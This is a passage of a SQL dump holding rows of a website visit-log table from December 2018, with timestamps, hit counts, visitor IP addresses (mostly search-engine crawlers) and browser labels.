200','chrome'),(347962,1544239448,1,1,0,0,'54.36.148.149','other'),(347963,1544239466,1,1,0,0,'46.229.168.130','other'),(347964,1544239470,1,1,0,0,'46.229.168.152','other'),(347965,1544239595,1,1,0,0,'46.229.168.129','other'),(347966,1544239643,1,1,0,0,'54.36.148.199','other'),(347967,1544239662,1,1,0,0,'46.229.168.140','other'),(347968,1544240123,1,1,0,0,'8.29.198.25','other'),(347969,1544240158,2,2,0,0,'66.249.75.20','chrome'),(347970,1544240273,2,2,0,0,'66.249.75.17','chrome'),(347971,1544240274,2,2,0,0,'66.249.75.22','chrome'),(347972,1544240398,1,1,0,0,'178.255.215.94','other'),(347973,1544240470,1,1,0,0,'54.36.149.54','other'),(347974,1544240659,1,1,0,0,'66.249.75.16','chrome'),(347975,1544240834,1,1,0,0,'66.249.69.204','chrome'),(347976,1544240848,1,1,0,0,'54.36.148.198','other'),(347977,1544240979,3,3,0,0,'40.77.167.74','other'),(347978,1544241025,1,1,0,0,'66.249.75.21','chrome'),(347979,1544241057,1,1,0,0,'66.249.69.202','chrome'),(347980,1544241400,1,1,0,0,'46.229.168.149','other'),(347981,1544241975,1,1,0,0,'46.229.168.136','other'),(347982,1544242070,2,2,0,0,'8.29.198.27','other'),(347983,1544242235,1,1,0,0,'66.249.75.16','chrome'),(347984,1544242236,1,1,0,0,'66.249.75.20','chrome'),(347985,1544242271,1,1,0,0,'66.249.75.15','chrome'),(347986,1544242272,1,1,0,0,'66.249.75.21','chrome'),(347987,1544242288,1,1,0,0,'46.229.168.150','other'),(347988,1544242492,1,1,0,0,'40.77.167.139','other'),(347989,1544242600,2,2,0,0,'66.249.75.22','chrome'),(347990,1544242783,1,1,0,0,'66.249.69.204','chrome'),(347991,1544242792,1,1,0,0,'54.36.148.173','other'),(347992,1544242940,1,1,0,0,'66.249.75.17','chrome'),(347993,1544242967,2,2,0,0,'207.46.13.36','other'),(347994,1544243297,1,1,0,0,'40.77.167.74','other'),(347995,1544243395,1,1,0,0,'54.36.149.86','other'),(347996,1544243711,7,7,0,0,'178.154.244.29','other'),(347997,1544243778,1,1,0,0,'54.36.149.78','other'),(347998,1544243852,1,1,0,0,'54.36.149.58','other'),(347999,1544243937,8,8,0,0,'178.154.244.11','other'),(348000,1544243977,1,1,0,0,'46.229.168.154','other'),(348001,1544243981,1,1,0,0,'46.229.168.150','other'),(348002,1544244061,1,1,0,0,'66.249.75.15','chrome'),(348003,1544244062,1,1,0,0,'66.249.75.21','chrome'),(348004,1544244084,1,1,0,0,'5.45.207.79','other'),(348005,1544244276,1,1,0,0,'207.46.13.77','other'),(348006,1544244338,1,1,0,0,'66.249.69.200','chrome'),(348007,1544244383,1,1,0,0,'46.229.168.134','other'),(348008,1544244387,1,1,0,0,'46.229.168.152','other'),(348009,1544244413,3,3,0,0,'66.249.75.22','chrome'),(348010,1544244589,1,1,0,0,'54.36.148.85','other'),(348011,1544244636,4,4,0,0,'178.154.244.29','other'),(348012,1544244667,1,1,0,0,'54.36.148.121','other'),(348013,1544244693,1,1,0,0,'5.255.253.38','other'),(348014,1544244695,1,1,0,0,'37.9.113.148','other'),(348015,1544244713,1,1,0,0,'157.55.39.200','other'),(348016,1544244783,1,1,0,0,'5.45.207.19','other'),(348017,1544244798,2,2,0,0,'66.249.75.20','chrome'),(348018,1544244842,1,1,0,0,'66.249.69.204','chrome'),(348019,1544244905,7,7,0,0,'178.154.244.11','other'),(348020,1544245004,1,1,0,0,'46.229.168.135','other'),(348021,1544245008,1,1,0,0,'46.229.168.147','other'),(348022,1544245009,2,2,0,0,'95.213.141.126','opera'),(348023,1544245092,5,5,0,0,'5.45.207.79','other'),(348024,1544245215,2,2,0,0,'66.249.75.21','chrome'),(348025,1544245241,1,1,0,0,'66.249.75.15','chrome'),(348026,1544245663,9,9,0,0,'178.154.244.29','other'),(348027,1544245752,1,1,0,0,'66.249.75.17','chrome'),(348028,1544245944,4,4,0,0,'178.154.244.11','other'),(348029,1544246018,2,2,0,0,'18.237.153.47','chrome'),(348030,1544246022,1,1,0,0,'40.77.167.137','other'),(348031,1544246067,1,1,0,0,'54.36.149.73','other'),(348032,1544246075,2,2,0,0,'5.45.207.79','other'),(348033,1544246133,1,1,0,0,'207.46.13.73','other'),(348034,1544246240,2,2,0,0,'66.249.69.202','chrome'),(348035,1544246408,2,2,0,0,'5.45.207.19','other'),(348036,1544246428,1,1,0,0,'157.55.39.200','other'),(348037,1544246484,1,1,0,0,'95.163.255.93','other'),(348038,1544246487,1,1,0,0,'95.163.255.97','other'),(348039,1544246551,2,2,0,0,'66.249.75.20','chrome'),(348040,1544246675,1,1,0,0,'66.249.75.21','chrome'),(348041,1544246956,1,1,0,0,'95.163.255.92','other'),(348042,1544246958,1,1,0,0,'95.163.255.95','other'),(348043,1544247098,2,2,0,0,'157.55.39.145','other'),(348044,1544247128,1,1,0,0,'54.36.148.174','other'),(348045,1544247162,1,1,0,0,'54.36.149.37','other'),(348046,1544247343,2,2,0,0,'40.77.167.137','other'),(348047,1544247405,1,1,0,0,'157.55.39.200','other'),(348048,1544247780,1,1,0,0,'46.229.168.129','other'),(348049,1544247867,2,2,0,0,'66.249.75.21','chrome'),(348050,1544247876,1,1,0,0,'66.249.75.16','chrome'),(348051,1544248083,1,1,0,0,'54.36.149.93','other'),(348052,1544248100,1,1,0,0,'178.154.244.29','other'),(348053,1544248101,1,1,0,0,'5.45.207.19','other'),(348054,1544248104,1,1,0,0,'178.154.171.27','other'),(348055,1544248108,1,1,0,0,'95.108.181.75','other'),(348056,1544248113,1,1,0,0,'46.229.168.154','other'),(348057,1544248488,2,2,0,0,'157.55.39.145','other'),(348058,1544248583,2,2,0,0,'207.46.13.104','other'),(348059,1544248843,2,2,0,0,'40.77.167.137','other'),(348060,1544248902,2,2,0,0,'46.229.168.148','other'),(348061,1544248906,1,1,0,0,'46.229.168.141','other'),(348062,1544249106,1,1,0,0,'66.249.75.22','chrome'),(348063,1544249301,1,1,0,0,'54.36.148.190','other'),(348064,1544249766,1,1,0,0,'66.249.75.16','chrome'),(348066,1544250315,2,2,0,0,'66.249.75.22','chrome'),(348067,1544250377,1,1,0,0,'54.36.149.96','other'),(348068,1544250955,1,1,0,0,'8.29.198.27','other'),(348069,1544251055,1,1,0,0,'54.36.148.221','other'),(348070,1544251460,1,1,0,0,'66.249.75.20','chrome'),(348071,1544251546,1,1,0,0,'54.36.148.27','other'),(348072,1544251681,1,1,0,0,'66.249.75.17','chrome'),(348073,1544251796,1,1,0,0,'66.249.75.15','chrome'),(348074,1544252131,1,1,0,0,'54.36.149.59','other'),(348075,1544252548,1,1,0,0,'54.36.148.165','other'),(348076,1544252615,1,1,0,0,'66.249.75.22','chrome'),(348077,1544252745,1,1,0,0,'46.229.168.150','other'),(348078,1544252749,1,1,0,0,'46.229.168.148','other'),(348079,1544252884,1,1,0,0,'54.36.149.26','other'),(348080,1544252907,1,1,0,0,'8.29.198.27','other'),(348081,1544252942,1,1,0,0,'8.29.198.26','other'),(348082,1544253241,3,3,0,0,'66.249.69.149','chrome'),(348083,1544253462,2,2,0,0,'66.249.69.204','chrome'),(348084,1544253692,1,1,0,0,'54.36.149.73','other'),(348085,1544254178,1,1,0,0,'40.77.167.190','other'),(348086,1544254257,1,1,0,0,'46.229.168.134','other'),(348087,1544254343,5,5,0,0,'66.249.69.148','chrome'),(348088,1544254481,2,2,0,0,'66.249.69.204','chrome'),(348089,1544254507,1,1,0,0,'54.36.149.16','other'),(348090,1544254515,2,2,0,0,'66.249.69.149','chrome'),(348091,1544254778,1,1,0,0,'40.77.167.204','other'),(348092,1544254825,1,1,0,0,'54.36.148.252','other'),(348093,1544254887,1,1,0,0,'54.36.148.80','other'),(348094,1544255013,1,1,0,0,'66.249.69.217','chrome'),(348095,1544255014,1,1,0,0,'66.249.69.202','chrome'),(348096,1544255032,3,3,0,0,'66.249.69.143','chrome'),(348097,1544255035,2,2,0,0,'66.249.69.150','chrome'),(348098,1544255156,1,1,0,0,'95.163.255.154','other'),(348099,1544255162,1,1,0,0,'95.163.255.167','other'),(348100,1544255245,1,1,0,0,'46.229.168.152','other'),(348101,1544255338,1,1,0,0,'54.36.148.52','other'),(348102,1544255599,1,1,0,0,'66.249.69.219','chrome'),(348103,1544255600,1,1,0,0,'66.249.69.200','chrome'),(348104,1544255690,1,1,0,0,'66.249.69.144','chrome'),(348105,1544255691,2,2,0,0,'66.249.69.148','chrome'),(348106,1544255750,1,1,0,0,'46.229.168.146','other'),(348107,1544256074,1,1,0,0,'54.36.148.28','other'),(348108,1544256102,1,1,0,0,'46.229.168.134','other'),(348109,1544256106,1,1,0,0,'46.229.168.147','other'),(348110,1544256966,1,1,0,0,'207.46.13.104','other'),(348111,1544257095,2,2,0,0,'5.45.207.79','other'),(348112,1544257250,4,4,0,0,'178.154.244.11','other'),(348113,1544257282,1,1,0,0,'87.250.224.65','other'),(348114,1544257420,1,1,0,0,'95.108.213.4','other'),(348115,1544257560,1,1,0,0,'54.36.149.59','other'),(348116,1544257562,1,1,0,0,'54.36.148.25','other'),(348117,1544257573,2,2,0,0,'66.249.69.144','chrome'),(348119,1544257624,1,1,0,0,'66.249.69.149','chrome'),(348120,1544257696,1,1,0,0,'66.249.69.145','chrome'),(348121,1544257697,1,1,0,0,'66.249.69.150','chrome'),(348122,1544257704,1,1,0,0,'66.249.69.143','chrome'),(348124,1544257713,1,1,0,0,'66.249.69.148','chrome'),(348125,1544257832,2,2,0,0,'178.154.244.29','other'),(348126,1544257888,1,1,0,0,'46.229.168.136','other'),(348127,1544257892,1,1,0,0,'46.229.168.141','other'),(348128,1544257979,1,1,0,0,'46.229.168.145','other'),(348129,1544257982,1,1,0,0,'5.45.207.19','other'),(348130,1544258304,1,1,0,0,'178.154.244.11','other'),(348131,1544258335,1,1,0,0,'54.36.148.101','other'),(348132,1544258713,1,1,0,0,'141.8.142.103','other'),(348133,1544258772,2,2,0,0,'217.69.143.217','firefox'),(348134,1544258855,1,1,0,0,'207.46.13.104','other'),(348135,1544259179,2,2,0,0,'66.249.69.143','chrome'),(348136,1544259180,2,2,0,0,'66.249.69.148','chrome'),(348137,1544259261,2,2,0,0,'66.249.69.204','chrome'),(348138,1544259370,1,1,0,0,'178.154.244.11','other'),(348139,1544259483,4,4,0,0,'69.58.178.59','other'),(348140,1544259838,1,1,0,0,'54.36.148.152','other'),(348141,1544259863,2,2,0,0,'5.45.207.19','other'),(348142,1544260070,1,1,0,0,'46.229.168.151','other'),(348143,1544260281,1,1,0,0,'54.36.148.119','other'),(348144,1544260334,1,1,0,0,'5.45.207.79','other'),(348145,1544260637,1,1,0,0,'54.36.148.177','other'),(348146,1544260677,1,1,0,0,'66.249.69.145','chrome'),(348147,1544260678,2,2,0,0,'66.249.69.150','chrome'),(348148,1544260741,2,2,0,0,'66.249.69.143','chrome'),(348149,1544260901,1,1,0,0,'54.36.148.37','other'),(348150,1544261075,2,2,0,0,'66.249.69.148','chrome'),(348151,1544261284,2,2,0,0,'91.196.178.184','chrome'),(348152,1544261307,2,2,0,0,'178.154.244.29','other'),(348153,1544261524,1,1,0,0,'95.163.255.162','other'),(348154,1544261527,1,1,0,0,'95.163.255.174','other'),(348155,1544261540,2,2,0,0,'46.229.168.148','other'),(348156,1544261612,1,1,0,0,'66.249.69.202','chrome'),(348157,1544261614,1,1,0,0,'66.249.69.149','chrome'),(348158,1544261713,1,1,0,0,'109.106.139.225','chrome'),(348159,1544261790,1,1,0,0,'8.29.198.25','other'),(348160,1544261816,1,1,0,0,'66.249.69.200','chrome'),(348161,1544262022,1,1,0,0,'54.36.148.168','other'),(348162,1544262052,1,1,0,0,'66.249.69.143','chrome'),(348164,1544262242,1,1,0,0,'46.229.168.152','other'),(348165,1544262245,1,1,0,0,'46.229.168.139','other'),(348166,1544262743,1,1,0,0,'54.36.148.163','other'),(348167,1544262951,1,1,0,0,'54.36.149.45','other'),(348168,1544263080,1,1,0,0,'46.229.168.151','other'),(348169,1544263278,1,1,0,0,'31.13.115.19','chrome'),(348170,1544263279,1,1,0,0,'31.13.115.9','chrome'),(348171,1544263287,1,1,0,0,'31.13.115.16','chrome'),(348172,1544263339,1,1,0,0,'46.229.168.134','other'),(348173,1544263638,1,1,0,0,'46.229.168.139','other'),(348174,1544263736,1,1,0,0,'95.163.255.94','other'),(348175,1544263738,1,1,0,0,'8.29.198.27','other'),(348176,1544263740,1,1,0,0,'95.163.255.98','other'),(348177,1544263769,1,1,0,0,'54.36.148.47','other'),(348178,1544263778,1,1,0,0,'8.29.198.26','other'),(348179,1544263810,1,1,0,0,'54.36.149.7','other'),(348180,1544263870,1,1,0,0,'54.36.148.116','other'),(348181,1544263996,1,1,0,0,'66.249.69.200','chrome'),(348182,1544264009,1,1,0,0,'54.36.148.215','other'),(348183,1544264028,1,1,0,0,'66.249.69.150','chrome'),(348184,1544264591,1,1,0,0,'46.229.168.151','other'),(348185,1544265347,1,1,0,0,'178.154.244.29','other'),(348186,1544265565,1,1,0,0,'54.36.148.249','other'),(348187,1544265713,1,1,0,0,'46.229.168.152','other'),(348188,1544265717,1,1,0,0,'46.229.168.140','other'),(348189,1544265768,1,1,0,0,'66.249.69.221','chrome'),(348190,1544265807,1,1,0,0,'90.188.255.142','chrome'),(348191,1544265993,1,1,0,0,'54.36.148.69','other'),(348192,1544266171,1,1,0,0,'207.46.13.104','other'),(348193,1544267102,1,1,0,0,'157.55.39.145','other'),(348194,1544267891,1,1,0,0,'46.229.168.139','other'),(348195,1544268153,1,1,0,0,'46.229.168.147','other'),(348196,1544268186,2,2,0,0,'66.249.69.150','chrome'),(348197,1544268203,1,1,0,0,'66.249.69.143','chrome'),(348198,1544268204,1,1,0,0,'66.249.69.149','chrome'),(348199,1544268223,1,1,0,0,'66.249.69.148','chrome'),(348200,1544268272,1,1,0,0,'207.46.13.104','other'),(348201,1544268446,1,1,0,0,'66.249.69.204','chrome'),(348202,1544268617,1,1,0,0,'54.36.148.90','other'),(348203,1544268654,1,1,0,0,'37.73.58.242','chrome'),(348204,1544268725,1,1,0,0,'66.249.75.22','chrome'),(348205,1544268875,1,1,0,0,'54.36.149.26','other'),(348206,1544269163,1,1,0,0,'66.249.69.150','chrome'),(348207,1544269374,3,3,0,0,'66.249.75.20','chrome'),(348208,1544269463,1,1,0,0,'54.36.148.165','other'),(348209,1544269496,2,2,0,0,'185.244.140.227','chrome'),(348210,1544269609,1,1,0,0,'54.36.148.237','other'),(348211,1544269631,2,2,0,0,'66.249.69.221','chrome'),(348212,1544269632,3,3,0,0,'66.249.69.202','chrome'),(348213,1544269670,1,1,0,0,'66.249.69.217','chrome'),(348214,1544269675,1,1,0,0,'178.154.244.29','other'),(348215,1544269724,1,1,0,0,'66.249.69.148','chrome'),(348216,1544269825,3,3,0,0,'66.249.69.204','chrome'),(348217,1544269851,1,1,0,0,'66.249.69.200','chrome'),(348218,1544269921,1,1,0,0,'46.229.168.133','other'),(348219,1544269993,1,1,0,0,'157.55.39.151','other'),(348220,1544270008,1,1,0,0,'54.36.148.15','other'),(348221,1544270042,1,1,0,0,'66.249.69.143','chrome'),(348222,1544270063,1,1,0,0,'66.249.75.16','chrome'),(348223,1544270341,1,1,0,0,'66.249.75.21','chrome'),(348224,1544270416,1,1,0,0,'66.249.75.22','chrome'),(348225,1544270488,1,1,0,0,'157.55.39.200','other'),(348226,1544270644,1,1,0,0,'66.249.69.202','chrome'),(348227,1544270688,1,1,0,0,'54.36.148.208','other'),(348228,1544270869,3,3,0,0,'178.154.244.29','other'),(348229,1544271085,1,1,0,0,'46.229.168.147','other'),(348230,1544271140,1,1,0,0,'66.249.69.204','chrome'),(348231,1544271177,2,2,0,0,'5.45.207.79','other'),(348232,1544271322,1,1,0,0,'54.36.149.102','other'),(348233,1544271353,1,1,0,0,'54.36.148.191','other'),(348234,1544271511,1,1,0,0,'54.36.148.237','other'),(348235,1544271530,2,2,0,0,'46.229.168.140','other'),(348236,1544271558,1,1,0,0,'54.36.148.164','other'),(348237,1544271590,2,2,0,0,'66.249.75.16','chrome'),(348238,1544271591,3,3,0,0,'66.249.75.20','chrome'),(348239,1544271765,3,3,0,0,'66.249.75.21','chrome'),(348240,1544271911,1,1,0,0,'178.154.244.29','other'),(348241,1544271932,1,1,0,0,'66.249.69.200','chrome'),(348242,1544272022,1,1,0,0,'66.249.75.22','chrome'),(348243,1544272212,1,1,0,0,'46.229.168.148','other'),(348244,1544272251,1,1,0,0,'46.229.168.153','other'),(348245,1544272496,1,1,0,0,'54.36.148.210','other'),(348246,1544272630,1,1,0,0,'8.29.198.27','other'),(348247,1544272693,1,1,0,0,'66.249.75.20','chrome'),(348248,1544272961,1,1,0,0,'5.45.207.79','other'),(348249,1544273131,2,2,0,0,'178.154.244.29','other'),(348250,1544273427,2,2,0,0,'66.249.75.15','chrome'),(348251,1544273604,1,1,0,0,'66.249.69.204','chrome'),(348252,1544273627,1,1,0,0,'66.249.69.202','chrome'),(348253,1544273651,1,1,0,0,'66.249.75.21','chrome'),(348254,1544273838,3,3,0,0,'66.249.75.20','chrome'),(348255,1544274019,1,1,0,0,'66.249.75.16','chrome'),(348256,1544274193,1,1,0,0,'66.249.75.17','chrome'),(348257,1544274306,1,1,0,0,'185.222.211.38','chrome'),(348258,1544274579,1,1,0,0,'8.29.198.27','other'),(348259,1544274615,1,1,0,0,'8.29.198.26','other'),(348260,1544274657,1,1,0,0,'66.249.75.21','chrome'),(348261,1544275107,1,1,0,0,'178.154.244.11','other'),(348262,1544275558,2,2,0,0,'66.249.75.21','chrome'),(348263,1544275734,1,1,0,0,'54.36.149.76','other'),(348264,1544275866,2,2,0,0,'66.249.75.22','chrome'),(348265,1544275885,1,1,0,0,'54.36.148.43','other'),(348266,1544275918,1,1,0,0,'66.249.69.204','chrome'),(348267,1544276124,2,2,0,0,'66.249.75.20','chrome'),(348268,1544277740,2,2,0,0,'66.249.75.21','chrome'),(348269,1544277855,1,1,0,0,'54.36.148.184','other'),(348270,1544278195,1,1,0,0,'66.249.69.200','chrome'),(348271,1544278558,1,1,0,0,'54.36.148.48','other'),(348272,1544278625,1,1,0,0,'66.249.75.15','chrome'),(348273,1544278626,1,1,0,0,'66.249.75.22','chrome'),(348274,1544278631,1,1,0,0,'66.249.75.16','chrome'),(348275,1544279323,1,1,0,0,'95.163.255.180','other'),(348276,1544279326,1,1,0,0,'95.163.255.159','other'),(348277,1544279344,1,1,0,0,'95.163.255.173','other'),(348278,1544279347,1,1,0,0,'95.163.255.190','other'),(348279,1544279448,1,1,0,0,'66.249.75.17','chrome'),(348281,1544279467,1,1,0,0,'54.36.148.79','other'),(348282,1544279576,1,1,0,0,'54.36.148.89','other'),(348283,1544279607,3,3,0,0,'66.249.75.20','chrome'),(348284,1544279680,1,1,0,0,'66.249.75.21','chrome'),(348285,1544279933,1,1,0,0,'66.249.75.22','chrome'),(348286,1544280123,1,1,0,0,'54.36.148.200','other'),(348287,1544280458,1,1,0,0,'134.249.89.52','chrome'),(348288,1544280568,1,1,0,0,'54.36.149.0','other'),(348289,1544280907,1,1,0,0,'37.144.52.194','msie'),(348290,1544281165,1,1,0,0,'66.249.69.204','chrome'),(348291,1544281267,1,1,0,0,'54.36.148.252','other'),(348292,1544281352,2,2,0,0,'66.249.75.21','chrome'),(348293,1544281358,2,2,0,0,'5.228.194.194','chrome'),(348294,1544281359,2,2,0,0,'95.221.55.244','firefox'),(348295,1544281401,4,4,0,0,'66.249.75.20','chrome'),(348296,1544281541,1,1,0,0,'66.249.75.17','chrome'),(348297,1544281638,1,1,0,0,'95.163.255.69','other'),(348298,1544281640,1,1,0,0,'95.163.255.65','other'),(348299,1544281648,1,1,0,0,'66.249.69.202','chrome'),(348300,1544281705,1,1,0,0,'54.36.148.59','other'),(348301,1544281764,1,1,0,0,'54.165.59.7','other'),(348302,1544282120,1,1,0,0,'46.229.168.150','other'),(348303,1544282484,1,1,0,0,'54.36.148.125','other'),(348304,1544282662,1,1,0,0,'95.163.255.67','other'),(348305,1544282665,1,1,0,0,'95.163.255.68','other'),(348306,1544282817,1,1,0,0,'176.120.100.8','firefox'),(348307,1544283164,1,1,0,0,'66.249.69.204','chrome'),(348308,1544283251,1,1,0,0,'46.229.168.142','other'),(348309,1544283444,1,1,0,0,'46.229.168.146','other'),(348310,1544283447,1,1,0,0,'46.229.168.139','other'),(348311,1544283466,1,1,0,0,'8.29.198.25','other'),(348312,1544283481,3,3,0,0,'178.154.244.11','other'),(348313,1544283528,1,1,0,0,'95.163.255.150','other'),(348314,1544283531,1,1,0,0,'95.163.255.178','other'),(348315,1544283732,1,1,0,0,'207.46.13.104','other'),(348316,1544283756,1,1,0,0,'54.36.148.180','other'),(348317,1544283803,1,1,0,0,'176.120.100.8','firefox'),(348318,1544283868,1,1,0,0,'54.36.148.13','other'),(348319,1544283973,1,1,0,0,'54.36.148.93','other'),(348320,1544284116,3,3,0,0,'40.77.167.118','other'),(348321,1544284126,1,1,0,0,'54.36.149.74','other'),(348322,1544284147,1,1,0,0,'178.154.244.29','other'),(348323,1544284158,3,3,0,0,'5.45.207.19','other'),(348324,1544284285,1,1,0,0,'5.58.14.187','firefox'),(348325,1544284337,1,1,0,0,'5.45.207.79','other'),(348326,1544284421,1,1,0,0,'93.170.118.191','msie'),(348327,1544284453,2,2,0,0,'66.249.75.17','chrome'),(348328,1544284454,2,2,0,0,'66.249.75.20','chrome'),(348329,1544284565,1,1,0,0,'66.249.75.22','chrome'),(348330,1544284669,1,1,0,0,'37.9.113.103','other'),(348331,1544284733,1,1,0,0,'54.36.148.249','other'),(348332,1544284815,5,5,0,0,'207.46.13.220','other'),(348333,1544284923,1,1,0,0,'141.8.142.103','other'),(348334,1544284992,1,1,0,0,'178.154.244.11','other'),(348335,1544285229,2,2,0,0,'157.55.39.151','other'),(348336,1544285291,1,1,0,0,'5.45.207.79','other'),(348337,1544285421,1,1,0,0,'8.29.198.26','other'),(348338,1544285446,1,1,0,0,'8.29.198.27','other'),(348339,1544285489,1,1,0,0,'213.180.203.9','other'),(348340,1544285505,1,1,0,0,'54.36.148.246','other'),(348341,1544285597,1,1,0,0,'46.229.168.151','other'),(348342,1544285634,1,1,0,0,'54.36.149.63','other'),(348343,1544285673,1,1,0,0,'46.229.168.150','other'),(348344,1544285763,1,1,0,0,'178.154.244.29','other'),(348345,1544285777,2,2,0,0,'66.249.75.20','chrome'),(348346,1544285963,2,2,0,0,'5.45.207.19','other'),(348347,1544286618,2,2,0,0,'66.249.75.15','chrome'),(348348,1544286619,2,2,0,0,'66.249.75.21','chrome'),(348349,1544286796,1,1,0,0,'66.249.69.202','chrome'),(348350,1544287129,1,1,0,0,'54.36.149.40','other'),(348351,1544287252,1,1,0,0,'54.36.148.251','other'),(348352,1544287339,1,1,0,0,'95.163.255.118','other'),(348353,1544287358,1,1,0,0,'95.163.255.107','other'),(348354,1544287378,1,1,0,0,'95.163.255.103','other'),(348355,1544287397,2,2,0,0,'95.163.255.105','other'),(348356,1544287428,1,1,0,0,'54.36.148.149','other'),(348357,1544287537,1,1,0,0,'54.36.148.122','other'),(348358,1544287556,1,1,0,0,'95.163.255.106','other'),(348359,1544287576,1,1,0,0,'95.163.255.114','other'),(348360,1544287616,1,1,0,0,'95.163.255.115','other'),(348361,1544287634,2,2,0,0,'66.249.75.16','chrome'),(348363,1544287702,1,1,0,0,'46.229.168.132','other'),(348364,1544287853,1,1,0,0,'54.36.149.100','other'),(348365,1544287984,1,0,1,0,'66.249.69.202',''),(348366,1544288117,2,2,0,0,'66.249.75.20','chrome'),(348367,1544288233,1,1,0,0,'46.229.168.133','other'),(348368,1544288372,1,1,0,0,'54.36.148.18','other'),(348369,1544288382,2,2,0,0,'46.211.27.224','chrome'),(348370,1544288402,3,3,0,0,'66.249.69.202','chrome'),(348371,1544288600,1,1,0,0,'54.36.149.27','other'),(348372,1544288612,1,1,0,0,'178.92.8.97','chrome'),(348373,1544288616,1,1,0,0,'207.46.13.220','other'),(348374,1544288812,1,1,0,0,'66.249.69.204','chrome'),(348375,1544288828,1,1,0,0,'54.36.149.0','other'),(348376,1544288990,1,1,0,0,'54.36.149.50','other'),(348377,1544289034,1,1,0,0,'66.249.75.20','chrome'),(348378,1544289106,1,1,0,0,'66.249.75.21','chrome'),(348379,1544289193,1,1,0,0,'66.249.69.219','chrome'),(348380,1544289825,1,1,0,0,'54.36.148.247','other'),(348381,1544289880,1,1,0,0,'54.36.148.115','other'),(348382,1544290034,2,2,0,0,'66.249.75.15','chrome'),(348383,1544290035,1,1,0,0,'66.249.75.22','chrome'),(348384,1544290080,1,1,0,0,'54.36.148.32','other'),(348385,1544290183,4,4,0,0,'66.249.75.20','chrome'),(348386,1544290238,1,1,0,0,'66.249.75.17','chrome'),(348387,1544290337,1,1,0,0,'66.249.69.202','chrome'),(348388,1544290360,2,2,0,0,'92.113.127.58','chrome'),(348389,1544290491,1,1,0,0,'207.46.13.220','other'),(348390,1544290741,1,1,0,0,'54.36.149.104','other'),(348391,1544290889,1,1,0,0,'54.36.148.19','other'),(348392,1544290946,1,1,0,0,'46.229.168.135','other'),(348393,1544290950,1,1,0,0,'46.229.168.146','other'),(348394,1544291026,1,1,0,0,'54.36.148.10','other'),(348395,1544291079,1,1,0,0,'54.36.149.91','other'),(348396,1544291115,1,1,0,0,'93.170.118.191','msie'),(348397,1544291145,1,1,0,0,'46.229.168.142','other'),(348398,1544291149,2,2,0,0,'46.229.168.154','other'),(348399,1544291334,1,1,0,0,'54.36.148.246','other'),(348400,1544291601,1,1,0,0,'54.36.148.91','other'),(348401,1544291749,1,1,0,0,'54.36.148.130','other'),(348402,1544291839,1,1,0,0,'40.77.167.118','other'),(348403,1544291874,2,2,0,0,'66.249.75.21','chrome'),(348404,1544292099,1,1,0,0,'66.249.69.204','chrome'),(348405,1544292760,1,1,0,0,'66.249.75.22','chrome'),(348406,1544292879,1,1,0,0,'54.36.148.128','other'),(348407,1544292978,1,1,0,0,'54.36.149.1','other'),(348408,1544293146,3,3,0,0,'91.209.11.236','other'),(348409,1544293616,1,1,0,0,'54.36.149.52','other'),(348410,1544293715,3,3,0,0,'95.163.255.108','other'),(348411,1544293753,1,1,0,0,'95.163.255.119','other'),(348412,1544293758,1,1,0,0,'95.163.255.114','other'),(348413,1544293889,1,1,0,0,'40.77.167.118','other'),(348414,1544293959,1,1,0,0,'66.249.69.221','chrome'),(348415,1544293961,1,1,0,0,'66.249.69.202','chrome'),(348416,1544293991,1,1,0,0,'46.229.168.139','other'),(348417,1544294023,1,1,0,0,'54.36.149.58','other'),(348418,1544294036,2,2,0,0,'207.46.13.104','other'),(348419,1544294152,1,1,0,0,'46.229.168.140','other'),(348420,1544294163,1,1,0,0,'66.249.75.16','chrome'),(348421,1544294287,1,1,0,0,'95.163.255.105','other'),(348422,1544294303,1,1,0,0,'8.29.198.26','other'),(348423,1544294434,1,1,0,0,'5.58.14.187','firefox'),(348424,1544294556,2,2,0,0,'66.249.69.204','chrome'),(348425,1544294730,1,1,0,0,'54.36.148.170','other'),(348426,1544294741,1,1,0,0,'207.46.13.220','other'),(348427,1544294908,1,1,0,0,'46.229.168.134','other'),(348428,1544295024,1,1,0,0,'54.36.149.80','other'),(348429,1544295315,6,6,0,0,'178.154.244.29','other'),(348430,1544295632,1,1,0,0,'178.154.244.11','other'),(348431,1544295666,1,1,0,0,'54.36.149.25','other'),(348432,1544295838,1,1,0,0,'66.249.69.219','chrome'),(348433,1544295839,1,1,0,0,'66.249.69.202','chrome'),(348434,1544295911,4,4,0,0,'91.196.178.81','chrome'),(348435,1544295914,1,1,0,0,'54.36.148.134','other'),(348436,1544296138,1,1,0,0,'66.249.75.20','chrome'),(348437,1544296170,1,1,0,0,'95.163.255.99','other'),(348438,1544296172,1,1,0,0,'95.163.255.92','other'),(348439,1544296218,3,3,0,0,'66.249.75.22','chrome'),(348440,1544296257,2,2,0,0,'8.29.198.27','other'),(348441,1544296338,1,1,0,0,'54.36.148.56','other'),(348442,1544296343,1,1,0,0,'46.229.168.130','other'),(348443,1544296378,1,1,0,0,'66.249.69.204','chrome'),(348444,1544296440,1,1,0,0,'54.36.148.98','other'),(348445,1544296446,4,4,0,0,'178.154.244.29','other'),(348446,1544296472,1,1,0,0,'54.36.148.14','other'),(348447,1544296722,1,1,0,0,'54.36.148.22','other'),(348448,1544297001,1,1,0,0,'5.45.207.79','other'),(348449,1544297016,1,1,0,0,'54.36.149.56','other'),(348450,1544297639,1,1,0,0,'46.229.168.154','other'),(348451,1544297642,1,1,0,0,'46.229.168.149','other'),(348452,1544297671,1,1,0,0,'54.36.148.52','other'),(348453,1544297770,1,1,0,0,'54.36.149.21','other'),(348454,1544297956,1,1,0,0,'66.249.75.20','chrome'),(348455,1544297976,1,1,0,0,'91.196.178.179','chrome'),(348456,1544297987,1,1,0,0,'66.249.75.21','chrome'),(348457,1544298199,1,1,0,0,'46.229.168.133','other'),(348458,1544298214,1,1,0,0,'54.36.149.77','other'),(348459,1544298392,3,3,0,0,'178.154.244.29','other'),(348460,1544298396,1,1,0,0,'178.154.244.11','other'),(348462,1544298499,1,1,0,0,'54.36.149.106','other'),(348463,1544298578,1,1,0,0,'54.36.148.210','other'),(348464,1544298618,1,1,0,0,'46.229.168.148','other'),(348465,1544298712,1,1,0,0,'54.36.149.78','other'),(348466,1544299073,1,1,0,0,'95.85.69.97','firefox'),(348467,1544299129,1,1,0,0,'66.249.69.204','chrome'),(348468,1544299233,1,1,0,0,'54.36.148.85','other'),(348469,1544299440,1,1,0,0,'54.36.148.117','other'),(348470,1544299567,1,1,0,0,'54.36.149.90','other'),(348471,1544299707,1,1,0,0,'66.249.75.15','chrome'),(348472,1544299708,2,2,0,0,'66.249.75.20','chrome'),(348473,1544299749,1,1